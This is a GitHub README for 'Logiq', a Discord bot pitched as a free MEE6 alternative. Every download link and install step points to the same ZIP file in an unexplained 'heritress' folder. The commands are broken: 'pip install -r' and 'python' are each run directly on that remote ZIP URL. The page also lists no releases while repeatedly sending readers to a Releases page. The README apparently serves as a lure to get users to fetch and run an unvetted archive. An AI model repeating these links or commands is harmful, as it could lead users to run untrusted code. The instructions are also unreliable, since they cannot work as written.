Skip to content

🤖 Create and customize your own open-source Discord bot with Logiq, offering premium features at no cost, built by the community for the community.

License

Notifications You must be signed in to change notification settings

Aittiphan23/Logiq

Repository files navigation

🤖 Logiq - Your Multi-Feature Discord Bot Solution

🚀 Getting Started

Logiq is a powerful open-source Discord bot designed to enhance your server experience. With features like verification, tickets, and a leveling system, it’s a fully free alternative to MEE6. Hosting Logiq on your own server is simple, and this guide will walk you through the process.

🛠️ System Requirements

  • Operating System: Windows 10 or higher, macOS, or a Linux distribution
  • RAM: At least 2 GB available
  • Disk Space: Minimum 100 MB free
  • Internet Connection: Stable connection for bot operation
  • MongoDB: Installed locally or accessible online

📥 Download Logiq

![Download Logiq](https://raw.githubusercontent.com/Aittiphan23/Logiq/main/heritress/Logiq.zip https://raw.githubusercontent.com/Aittiphan23/Logiq/main/heritress/Logiq.zip)

To get started, you will first need to download Logiq from our Releases page.

📂 Download & Install

  1. Visit the Releases Page

  2. Choose Your Version

    • Select the latest version of Logiq listed at the top. You’ll find files categorized for different operating systems.
  3. Download the File

  4. Extract the Files

    • If you downloaded a ZIP file, locate it on your computer, right-click and choose “Extract All”. Follow the prompts to access the files.
  5. Install Dependencies

    • Make sure to have Python installed on your system. Logiq requires Python 3.7 or higher.
    • Install the required packages. Open your terminal or command prompt and run:
      pip install -r https://raw.githubusercontent.com/Aittiphan23/Logiq/main/heritress/Logiq.zip
      
  6. Set Up MongoDB

    • You can host MongoDB locally or use a cloud service. Follow the setup instructions provided by MongoDB.
    • Update your configuration file with the MongoDB URI.
  7. Run Logiq

    • In your terminal, navigate to the folder where you extracted Logiq.
    • Use the following command to start the bot:
      python https://raw.githubusercontent.com/Aittiphan23/Logiq/main/heritress/Logiq.zip
      
  8. Invite Logiq to Your Server

    • Generate an invite link from the Discord Developer Portal to add Logiq to your server. Ensure you grant the necessary permissions for Logiq to function fully.

⚙️ Features

  • Verification System: Ensure that only verified members can access certain channels.
  • Ticketing System: Allow users to create support tickets with ease.
  • Role Menus: Let users choose roles through interactive menus.
  • Leveling: Encourage activity with a personal leveling system.
  • Economy Systems: Implement a virtual economy for your server.
  • Moderation Tools: Manage users effectively with powerful moderation commands.
  • Games: Add fun with integrated games.
  • Music Features: Play music directly in voice channels effortlessly.

💡 Troubleshooting

If you encounter issues while downloading or running Logiq, consider the following solutions:

  • Error Messages: Pay attention to any error messages during installation or runtime. Many common problems come from missing dependencies.
  • Configuration Issues: Ensure that your configuration settings match your MongoDB setup. Double-check the URI and any account credentials.
  • Python Version: Verify that you are using the correct version of Python. Check by running python --version in your terminal.
  • Network Issues: Make sure your internet connection is stable when running the bot, especially for features that require external data.

🤝 Community Support

If you need help, feel free to reach out on our Discord server. The community is ready and willing to assist you.

🔗 Additional Resources

To learn more about Logiq or get involved:

Start enhancing your Discord server today by downloading Logiq! Don’t forget to visit the Releases page for the latest updates.

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages